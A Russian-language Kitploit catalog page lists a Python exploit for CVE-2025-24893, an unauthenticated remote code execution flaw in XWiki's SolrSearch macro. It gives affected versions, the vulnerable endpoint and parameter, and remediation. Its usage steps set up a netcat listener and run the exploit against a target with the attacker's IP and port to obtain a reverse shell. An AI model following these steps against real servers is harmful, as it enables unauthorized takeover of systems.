Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893 — Эксплойт удаленного выполнения кода (RCE) в XWiki | Kitploit
Инструменты/GitHubGitHub/hasecto/cve-2025-24893
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhasecto/cve-2025-24893

CVE-2025-24893

Эксплойт удаленного выполнения кода (RCE) в XWiki

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893

Эксплойт удаленного выполнения кода (RCE) в XWiki

Эксплойт на Python3 для CVE-2025-24893, критической уязвимости неаутентифицированного удаленного выполнения кода (RCE), затрагивающей платформу XWiki.

Этот скрипт эксплуатирует уязвимость инъекции кода/выражения (CWE-95) в компоненте макроса SolrSearch. Уязвимость позволяет злоумышленникам выполнять произвольный код Groovy/Java в базовой операционной системе. Эксплойт автоматически выполняет кодировку Base64, чтобы обойти ограничения интерпретации команд функции Java Runtime.getRuntime().exec().

📊 Детали уязвимости

  • CVE ID: CVE-2025-24893
  • Оценка CVSS: 9.8 Критическая (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (Недостаточная нейтрализация выражения языка выражений / Eval-инъекция)
  • Целевой компонент: /bin/get/Main/SolrSearch (через параметр text)

🔍 Затронутые версии

  • Все версии, начиная с 5.3-milestone-2 до 15.10.10
  • Версии 16.0.0-rc-1 до 16.4.0

🚀 Как использовать

1. Запустите свой слушатель (Netcat) на Kali Linux:

root@kitploit:~
nc -lvnp 4444

2. Запустите эксплойт:

root@kitploit:~
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>

Пример:

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ Требования

  • Python 3.x
  • Библиотека requests

Чтобы установить необходимую зависимость:

root@kitploit:~
pip install requests

🛡️ Исправление

Обновите ваш экземпляр XWiki до одной из официальных исправленных версий: 15.10.11, 16.4.1, 16.5.0-rc-1 (или выше).

⚠️ Предупреждение (Отказ от ответственности)

Этот скрипт разработан исключительно для образовательных целей, авторизованных аудитов безопасности и тестов на проникновение (Pentest). Автор не несет ответственности за любое неправомерное использование, ущерб или незаконные действия, вызванные этим инструментом. Использование этого скрипта против целей без предварительного разрешения строго запрещено.

Скачать инструмент